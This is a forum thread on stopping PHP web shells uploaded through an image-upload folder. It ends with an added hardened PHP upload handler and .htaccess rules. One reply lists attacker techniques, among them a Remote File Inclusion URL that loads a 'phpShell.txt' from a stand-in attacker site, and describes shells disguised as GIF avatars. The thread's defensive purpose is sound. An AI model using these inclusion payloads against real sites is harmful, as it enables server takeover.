I have an upload file and it has been hacked by a php shell before. So I was wondering how I can prevent it from happening? My folder is chmod using 777 because by using other numbers, I could not make the images viewable at all. cheers, toby
Hi, you should only make uploads available to trusted file extensions. You should also use some php library to ensure that the jpg and gif or any other file is a valid image and not some hidden script.
You can chmod to other numbers.. I don't remember the exact one.. and still be able to view files.. 777 for a public folder would mean write access for all.. I think it's very insecure.
Thanks a lot guys. In fact, the php that is uploaded is with extension .gif or .png, so I really have no clue how to disable the phpshell from upload. syedwasi, I've tried other numbers but it doesn't work. It makes the images unviewable. It works if the chmod is 777. What other numbers can be done? And what actually is the group? i.e. first 7 is owner, second 7 is group, third 7 is public. So what are owner and group anyway?
Easiest fix would be to check the uploaded file for the opening PHP tag, if it's there, delete the file.
Anti phpShell is not easy. If you use shared hosting, Zend encode important files. A dedicated server maybe needn't encode. However you must check for upload shell or include shell. There are a lot of ways attackers use a phpShell:
- Upload phpShell into a hosting account on the same server and local attack
- Remote File Inclusion, like: httX://yourSite/bad_code_file.php?action=_httX://attackerSite/phpShell.txt?
- Upload an image file type (.JPG, GIF...) as avatar but this file's content is phpShell and include it.
You must know what type the attacker uses to fix it. Maybe use .htaccess to deny execution of .phpX files to protect the folder; it still allows your images. Any problem or need help, contact me.
Well, something else to add here if you do not want to go the .htaccess route to stop .php files from being executed. If you're running on your own server you could disable dangerous functions like shell_exec. But both these solutions are just ignoring the root of the problem, which is an insecure script which is either allowing bad file extensions or allowing remote includes.
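To pull the advice in this thread together (validate that the file is a real image, never trust the client's extension, deny script execution in the upload folder, and avoid 777), here is an added example of a hardened image-upload handler. It is not code from any poster; it assumes PHP 8 with the GD and fileinfo extensions, a form field named `avatar`, and an upload directory `$uploadDir` of your choosing.

```php
<?php
// Added example: hardened avatar upload. Assumes PHP >= 8.0 with GD + fileinfo.
$uploadDir = __DIR__ . '/uploads';   // assumption: owned by the web-server user, mode 0755 (not 0777)
$allowed   = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function storeImage(array $file, string $uploadDir, array $allowed): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // 1. Decide from the bytes, not from the client-supplied name or extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // 2. Re-encode through GD: a "GIF that is also a php shell" loses the
    //    embedded script because only the decoded pixels are written back out.
    $img = imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }
    // 3. Server-chosen random name with a fixed, safe extension.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = $uploadDir . '/' . $name;
    $ok = match ($allowed[$mime]) {
        'jpg' => imagejpeg($img, $dest, 90),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0644);   // readable by the web server, never executable
    return $name;
}

// 4. Defence in depth (the ".htaccess route" above): stop Apache from ever
//    running scripts out of the upload directory, whatever the file is called.
$htaccess = $uploadDir . '/.htaccess';
if (!file_exists($htaccess)) {
    file_put_contents($htaccess,
        "php_flag engine off\n" .
        "<FilesMatch \"\\.ph(p[0-9]?|tml|ar)$\">\n    Require all denied\n</FilesMatch>\n");
}

echo storeImage($_FILES['avatar'], $uploadDir, $allowed);
```

On the permissions question in the thread: images are usually only viewable with 777 because the directory is owned by a different Unix user than the one the web server runs as; once the web-server user owns the directory (or its group has write access), 0755 or 0775 is enough and 777 is never needed.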